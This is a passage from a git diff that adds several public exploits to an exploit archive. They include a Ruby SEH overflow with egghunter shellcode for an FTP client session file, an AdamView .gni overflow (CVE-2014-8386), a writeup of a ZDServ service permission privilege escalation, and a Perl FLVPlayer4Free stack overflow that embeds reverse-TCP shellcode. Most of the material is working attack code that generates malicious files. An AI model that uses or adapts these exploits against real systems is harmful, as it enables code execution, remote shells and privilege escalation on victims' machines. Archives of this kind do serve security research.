+"\x9a\xc5\x28\x8f\x15\xdd\x47\x33\x72\xeb\xde\x28\x12\xb3" +
+"\xc0\x8e\xc3\x2b\x75\xe3\x47\xee\x1d\x8b\x2b\x81\xb4\x03" +
+"\xdb\x7d\x02\xab\x4b\x36\xe9\x27\xe0\xf7\x38\x3f\xb4\xd3" +
+"\xaa\xb6\xa4\x2d\x19\x9a\x75\x1f\xcf\xe5\xaa\xae\x2f\x49" +
+"\xb4\x84\xa7"
+
+# badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2'
+# only locate 1st heap address :P
+heap_addr =
+"\x50" + # push eax
+"\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh
+"\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777fh
+"\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx]
+"\xb9\x0f\x78\x77\x77" + # mov ebx,7777780Fh
+"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh
+"\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx]
+"\x8b\x1b" #  mov ebx,dword ptr [ebx]
+
+egghunter =
+"\x8b\xd3\xeb\x05" + # mov edx,ebx # jmp $+7h
+"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e" +
+"\x3c\x05\x5a\x74\xef\xb8" +
+"\x77\x30\x30\x74" + # our tag 'w00t'
+"\x8b\xfa\xaf\x75\xea\xaf" +
+"\x75\xe7"
+
+memcpy_func =
+"\x58" + # pop eax # esp
+"\x81\xc4\x54\xf2\xff\xff" + # add esp,-3500
+"\xb9\xef\xe6\x3b\xef" + # mov ecx,0xef3be6ef
+"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f
+"\x89\x08" + # mov [eax],ecx # memcpy() static address
+"\x89\xc1" + # mov ecx,eax
+"\x83\xc1\x10" + # add ecx,10h
+"\x89\x48\x04" + # mov [eax+4h],ecx # void *dest
+"\x89\x48\x08" + # mov [eax+8h],ecx # void *dest
+"\x89\x78\x0c" + # mov [eax+0ch],edi # const wchar_t *src (shellcode)
+"\xb9\x8d\x79\x77\x77" + # mov ecx,0x7777798d
+"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f
+"\x89\x48\x10" + # mov [eax+10h],ecx # size_t count
+"\x94\xc3" # xchg eax,esp # retn
+
+stack_sc = heap_addr + egghunter + memcpy_func
+
+# GetPC
+buff[1,2] = "\xd9\xeb"                      # fldpi
+buff[3,5] = "\x9b\xd9\x74\x24\xf4"          # fstenv [esp-0xc]
+buff[8,1] = "\x58" # pop eax                # pop esp into eax
+
+# FixRet stub 
+buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45"  # (1)
+buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp
+buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr
+
+buff[30,stack_sc.size] = stack_sc
+
+# restore 1st shellcode
+buff[12,4] = buff[seh-24,4]                 # replace with original sc (1)
+buff[19,4] = buff[seh-4,4]                  # replace with original sc (2)
+buff[26,4] = buff[seh,4]                    # replace with original sc (3)
+
+buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp $-166
+buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null
+
+bps =
+"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" +
+"\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" +
+"\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" +
+"\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" +
+"\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" +
+"\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" +
+"\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" +
+buff + "\x0D\x0A\x61\x6E" +
+"\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" +
+"\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" +
+"\x0A"
+
+File.open(filename,"wb") do |fp|
+  fp.write(bps)
+  puts "Exploit file: #{filename} size: #{bps.size}"
+  fp.close
+end
diff --git a/platforms/windows/local/35503.rb b/platforms/windows/local/35503.rb
new file mode 100755
index 000000000..ca8ab97eb
--- /dev/null
+++ b/platforms/windows/local/35503.rb
@@ -0,0 +1,131 @@
+#!/usr/bin/env ruby
+# Exploit Title: Advantech AdamView (.gni) SEH Buffer Overflow
+# Date: Dec 09 2014
+# Vulnerability Discovery: Daniel Kazimirow and Fernando Paez - Core Security
+# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
+# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-179WGW
+# Version: 4.30.003
+# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
+# CVE: CVE-2014-8386
+# Advisory ID: CORE-2014-0008
+
+filename = "crash-it.gni"
+buf = "A" * 1022
+seh = 134
+
+# bad chars '\x61 .. \x7a'
+# pop mspaint
+sc =
+"\xb8\x99\x4e\x83\xd1\x2d\x1f\x10\x10\x10\x50" +
+"\xb8\xcb\xaf\xe6\x3e\x50\xb8\xc5\xf9\x87\x7b" +
+"\x2d\x1f\x1f\x1f\x1f\x50\xb8\x9f\x7b\x5d\x8b" +
+"\x2d\x1f\x16\x16\x16\x50\xb8\x8a\x27\xe6\xa0" +
+"\x2d\x1f\x10\x10\x10\x50\xb8\x1e\x12\x8a\x16" +
+"\x50\xb8\x09\x7b\x7e\x17\x2d\x1f\x11\x11\x11" +
+"\x50\xb8\x3f\x2a\x50\x85\x50\xb8\xc9\x97\x1d" +
+"\x82\x2d\x1f\x10\x10\x10\x50\xb8\x9d\x81\x7b" +
+"\xc2\x2d\x1f\x17\x17\x17\x50\xb8\xca\x1d\x8a" +
+"\x59\x2d\x1f\x10\x10\x10\x50\xb8\x20\x42\xfd" +
+"\xb4\x50\xb8\x1e\xe1\x94\x85\x50\xb8\x82\x94" +
+"\xa3\x85\x2d\x1f\x10\x10\x10\x50\xb8\x38\xc9" +
+"\x4c\xf7\x50\xb8\x33\xda\x17\x4d\x50\xb8\x42" +
+"\x82\xb6\xf8\x2d\x1f\x10\x10\x10\x50\xb8\x91" +
+"\xa6\xd0\xe7\x2d\x1f\x10\x10\x10\x50\xb8\x56" +
+"\xca\x13\xb6\x50\xb8\x8f\x4a\x57\xa1\x2d\x1f" +
+"\x10\x10\x10\x50\xb8\x1a\x4f\xda\x7e\x2d\x1f" +
+"\x10\x10\x10\x50\xb8\x93\x1a\xcb\xb9\x50\xb8" +
+"\xd0\x15\x7e\xad\x50\xb8\xf0\xe4\xaa\x2b\x50" +
+"\xb8\xec\x43\xd9\x88\x50\xb8\x17\x39\xfd\xfd" +
+"\x50\xb8\xdb\x3a\x40\xfa\x50\xb8\x9a\xfd\x9f" +
+"\x8f\x50\xb8\xa3\x31\x12\x4d\x50\xb8\x5a\xff" +
+"\x2d\x9e\x50\xb8\xa9\xfc\xfb\x4f\x50\xb8\x84" +
+"\xe2\x7b\xa1\x2d\x2f\x2d\x2d\x2d\x50\xb8\x84" +
+"\x98\xad\x7b\x2d\x1f\x14\x14\x14\x50\xb8\x2d" +
+"\x1c\x91\x38\x50\xb8\x22\xcb\x39\x23\x50\xb8" +
+"\x07\xf4\x4c\x89\x50\xb8\xc7\x7f\xec\xee\x50" +
+"\xb8\xa2\x3a\x2f\xcf\x50\xb8\xe9\x2d\x7c\xde" +
+"\x50\xb8\xcb\x40\x83\x9a\x2d\x1f\x10\x10\x10" +
+"\x50\xb8\x8d\xfe\x7e\x4b\x50\xb8\x10\x0d\x3b" +
+"\x7b\x2d\x1f\x10\x10\x10\x50\xb8\x2d\x2e\xe8" +
+"\xe9\x50\xb8\xea\x10\xe7\xd7\x2d\x1f\x10\x10" +
+"\x10\x50\xb8\xe2\x0a\x7b\x83\x2d\x1f\x1b\x1b" +
+"\x1b\x50\xb8\x8d\xfb\xc4\x04\x50\xb8\xe5\xa6" +
+"\x34\x7f\x2d\x1f\x10\x10\x10\x50\xb8\xaf\xf9" +
+"\x91\x7b\x2d\x1f\x1c\x1c\x1c\x50\xb8\x19\x38" +
+"\x44\x4d\x50\xb8\xd1\xc7\xb3\x2a\x50\xb8\x22" +
+"\x7b\x27\xf3\x2d\x1f\x11\x11\x11\x50\xb8\x23" +
+"\x42\x7b\x27\x2d\x1f\x11\x11\x11\x50\xb8\xb1" +
+"\x32\x83\xc2\x50\xb8\xf4\x5a\x31\xc9\x50\xb8" +
+"\xc2\xe9\x84\x34\x2d\x1f\x10\x10\x10\x50\xb8" +
+"\xbd\x24\x3b\x5b\x50\xb8\x90\x90\xda\xc3\x50"
+
+buf[seh-4,4]  = "\xeb\x0a\x41\x41" # jmp $+16
+buf[seh,4]    = [0x22b0249b].pack("V").force_encoding("utf-8") # ppr
+
+
+buf[seh+8,6] = "\x81\xc4\x54\xf2\xff\xff" # add esp,-3500
+buf[seh+14,sc.size] = sc
+buf[seh+(14+sc.size),2] = "\xff\xd4"
+
+gni_file =
+"\x41\x47\x4e\x49\xae\x01\x04\x00" +
+"\x27\x48\x00\x00\x27\x48\x00\x00" +
+"\x27\x48\x00\x00\x27\x48\x00\x00" +
+"\x27\x48\x00\x00\x27\x48\x00\x00" +
+"\x27\x48\x00\x00\x48\x45\x41\x44" +
+"\x16\x00\x27\x00\x00\x00\x00\x00" +
+"\x00\x00\x32\x00\x00\x00\x00\xff" +
+"\x00\x00\x00\x00\x80\x02\xe0\x01" +
+"\x53\x57\x50\x4c\x30\x00\x00\x00" +
+"\x00\x00\x01\x00\x00\x00\xfe\xfe" +
+"\xff\xff\xff\xff\xff\xff\xff\xff" +
+"\xff\xff\xff\xff\xff\xff\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\xb0\x04" +
+"\x00\x00\xb7\x01\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x42\x54" +
+"\x53\x4b\x76\x00\x01\x00\x00\x00" +
+"\x2a\x01\x01\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x01\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x05\x00\x00\x00" +
+"\x54\x41\x53\x4b\x31\x00\x00\x00" +
+"\x00\x00\x00\x01\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x02\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\xc8\x42\x45\x54\x53\x4b\x50\x57" +
+"\x50\x4c\x3d\x00\x00\x00\x00\x00" +
+"\x01\x00\x00\x00\xff\xff\xff\xff" +
+"\xff\xff\xff\xff\xff\xff\xff\xff" +
+"\xff\xff\xff\xff\x16\x00\x00\x00" +
+"\x1d\x00\x00\x00\xc6\x04\x00\x00" +
+"\xbc\x01\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x07\x01" +
+"\x00\xfe\x03" + buf + # '\xfe\x03' controlled buffer size 
+"\x00\x50\x45\x4e\x44\x46\x56\x4b" +
+"\x53\x24\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x01\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x00\x00\x00" +
+"\x00\x00\x00\x00\x00\x4e\x45\x54" +
+"\x4b\x41\x44\x41\x4d\x56\x69\x65" +
+"\x77\x00\x00\x00\x00\xd0\x07\xd0" +
+"\x07\x01\x00\x00\x00\x01\x00\x00" +
+"\x00\x5a\x45\x4f\x46"
+
+bug = gni_file
+
+File.open(filename,"wb") do |fp|
+  fp.write(bug)
+  fp.close
+end
diff --git a/platforms/windows/local/35512.txt b/platforms/windows/local/35512.txt
new file mode 100755
index 000000000..e57a4e973
--- /dev/null
+++ b/platforms/windows/local/35512.txt
@@ -0,0 +1,47 @@
+# Exploit Title:mobilis 3g mobiconnect 3G++ ZDServer 1.0.1.2  Service Trusted Path Privilege Escalation
+# Date: 07/12/2014
+#Author: Hadji Samir s-dz@hotmail.fr
+#Product web page: http://www.3G.dz/   http://www.mobilis.dz/
+#Affected version: 1.0.1.2
+#Tested on:  Windows 7  (FR)
+# Thanks Rachid Ben elkharchi
+
+
+   
+ mobilis 3g mobiconnect 3G++ 
+'ZDServ.exe'
+service for Windows. This could potentially allow an authorized but
+non-privileged local user to execute arbitrary code with elevated
+privileges on the system. A successful attempt would require the
+local user to be able to insert their code in the system root path
+undetected by the OS or other security applications where it could
+potentially be executed during application startup or reboot. If
+successful, the local user’s code would execute with the elevated
+privileges of the application. 
+
+
+C:\Users\samir>sc qc ZDServ
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: ZDServ
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ZDServ
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+
+
+
+
+C:\Program Files\Hostless Modem\MOBICONNECT\ZDServSetup\ZDServ.exe Tout le monde:(I)(F)
+                                                                   AUTORITE NT\SystŠme:(I)(F)
+                                                                   BUILTIN\Administrateurs:(I)(F)
+                                                                   BUILTIN\Utilisateurs:(I)(RX)
+
+1 fichiers correctement trait‚sÿ; ‚chec du traitement de 0 fichiers
\ No newline at end of file
diff --git a/platforms/windows/remote/35509.pl b/platforms/windows/remote/35509.pl
new file mode 100755
index 000000000..8e4ee7877
--- /dev/null
+++ b/platforms/windows/remote/35509.pl
@@ -0,0 +1,113 @@
+source: http://www.securityfocus.com/bid/47045/info
+
+FLVPlayer4Free is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+FLVPlayer4Free 2.9.0 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+
+###
+# Title : FLVPlayer4Free v2.9 (.fp4f) Stack Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows 
+# Impact : Stack Overflow
+# Tested on : Windows XP SP3 Fran?ais 
+# Target : FLVPlayer4Free v 2.9.0
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";                  
+print "    |=============================================|\n";
+print "    |= [!] Name : FLVPlayer4Free (.fp4f) v2.9    =|\n";
+print "    |= [!] Exploit : Stack Overflow Exploit      =|\n";
+print "    |= [!] Author : KedAns-Dz                    =|\n";
+print "    |= [!] Mail: Ked-h(at)hotmail(dot)com        =|\n";
+print "    |=============================================|\n";
+sleep(2);
+print "\n";
+my $junk= "http://"."\x41" x 17425;
+my $eip = pack('V',0x7C86467B); # jmp esp from kernel32.dll
+my $padding = "\x90" x 30;
+# windows/shell_reverse_tcp - 739 bytes (http://www.metasploit.com)
+# Encoder: x86/alpha_mixed
+# LHOST=127.0.0.1, LPORT=4444
+my $shellcode = 
+"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
+"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
+"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
+"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
+"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
+"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
+"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
+"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
+"\x78\x4e\x69\x45\x50\x47\x70\x43\x30\x51\x70\x4e\x69\x4d" .
+"\x35\x44\x71\x4e\x32\x45\x34\x4c\x4b\x43\x62\x44\x70\x4c" .
+"\x4b\x51\x42\x44\x4c\x4e\x6b\x50\x52\x47\x64\x4c\x4b\x44" .
+"\x32\x46\x48\x44\x4f\x4f\x47\x43\x7a\x46\x46\x45\x61\x4b" .
+"\x4f\x50\x31\x4f\x30\x4e\x4c\x45\x6c\x50\x61\x51\x6c\x45" .
+"\x52\x46\x4c\x45\x70\x49\x51\x4a\x6f\x44\x4d\x43\x31\x4b" .
+"\x77\x4a\x42\x4c\x30\x50\x52\x42\x77\x4e\x6b\x43\x62\x44" .
+"\x50\x4c\x4b\x42\x62\x47\x4c\x43\x31\x48\x50\x4e\x6b\x51" .
+"\x50\x42\x58\x4e\x65\x4b\x70\x51\x64\x50\x4a\x46\x61\x4e" .
+"\x30\x46\x30\x4e\x6b\x51\x58\x44\x58\x4e\x6b\x43\x68\x45" .
+"\x70\x46\x61\x49\x43\x4b\x53\x45\x6c\x47\x39\x4e\x6b\x46" .
+"\x54\x4e\x6b\x47\x71\x49\x46\x45\x61\x49\x6f\x50\x31\x49" .
+"\x50\x4e\x4c\x4b\x71\x48\x4f\x44\x4d\x45\x51\x49\x57\x46" .
+"\x58\x4b\x50\x43\x45\x49\x64\x44\x43\x51\x6d\x48\x78\x45" .
+"\x6b\x51\x6d\x46\x44\x50\x75\x48\x62\x46\x38\x4c\x4b\x43" .
+"\x68\x47\x54\x47\x71\x4e\x33\x43\x56\x4c\x4b\x46\x6c\x42" .
+"\x6b\x4e\x6b\x42\x78\x45\x4c\x47\x71\x4a\x73\x4e\x6b\x43" .
+"\x34\x4c\x4b\x47\x71\x48\x50\x4d\x59\x51\x54\x44\x64\x51" .
+"\x34\x43\x6b\x43\x6b\x50\x61\x43\x69\x42\x7a\x43\x61\x4b" .
+"\x4f\x4d\x30\x46\x38\x51\x4f\x51\x4a\x4c\x4b\x47\x62\x48" .
+"\x6b\x4c\x46\x43\x6d\x45\x38\x45\x63\x44\x72\x47\x70\x43" .
+"\x30\x42\x48\x50\x77\x42\x53\x46\x52\x51\x4f\x43\x64\x45" .
+"\x38\x42\x6c\x50\x77\x51\x36\x43\x37\x4b\x4f\x4a\x75\x4f" .
+"\x48\x4a\x30\x45\x51\x45\x50\x47\x70\x51\x39\x4f\x34\x50" .
+"\x54\x42\x70\x45\x38\x46\x49\x4d\x50\x42\x4b\x43\x30\x49" .
+"\x6f\x48\x55\x50\x50\x50\x50\x50\x50\x50\x50\x47\x30\x42" .
+"\x70\x51\x50\x46\x30\x43\x58\x4a\x4a\x46\x6f\x49\x4f\x4d" .
+"\x30\x4b\x4f\x49\x45\x4d\x59\x48\x47\x45\x38\x51\x6f\x47" .
+"\x70\x45\x50\x47\x71\x43\x58\x46\x62\x45\x50\x44\x51\x43" .
+"\x6c\x4b\x39\x4d\x36\x42\x4a\x42\x30\x50\x56\x51\x47\x45" .
+"\x38\x4e\x79\x4e\x45\x42\x54\x51\x71\x4b\x4f\x4b\x65\x50" .
+"\x68\x50\x63\x50\x6d\x45\x34\x45\x50\x4d\x59\x48\x63\x42" .
+"\x77\x50\x57\x42\x77\x46\x51\x4a\x56\x50\x6a\x46\x72\x50" .
+"\x59\x46\x36\x4b\x52\x4b\x4d\x42\x46\x48\x47\x42\x64\x44" .
+"\x64\x47\x4c\x45\x51\x46\x61\x4c\x4d\x51\x54\x47\x54\x46" .
+"\x70\x48\x46\x45\x50\x47\x34\x51\x44\x50\x50\x42\x76\x42" .
+"\x76\x46\x36\x50\x46\x46\x36\x42\x6e\x42\x76\x46\x36\x51" .
+"\x43\x46\x36\x50\x68\x51\x69\x48\x4c\x47\x4f\x4e\x66\x4b" .
+"\x4f\x4e\x35\x4f\x79\x4b\x50\x50\x4e\x43\x66\x51\x56\x49" .
+"\x6f\x44\x70\x43\x58\x45\x58\x4f\x77\x45\x4d\x43\x50\x49" .
+"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4f\x45\x4e\x42\x51\x46\x42" .
+"\x48\x4c\x66\x4f\x65\x4d\x6d\x4d\x4d\x4b\x4f\x4a\x75\x45" .
+"\x6c\x45\x56\x51\x6c\x47\x7a\x4b\x30\x49\x6b\x4b\x50\x50" .
+"\x75\x47\x75\x4d\x6b\x47\x37\x46\x73\x44\x32\x42\x4f\x50" .
+"\x6a\x43\x30\x42\x73\x49\x6f\x48\x55\x41\x41";
+open(file , ">", "Kedans.fp4f"); 
+print file $junk.$eip.$padding.$shellcode;  
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close(file); 
+
+#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
+# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
+# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
+# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
+# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com 
+# www.metasploit.com * www.securityreason.com *  All Security and Exploits Webs ...
+#================================================================================================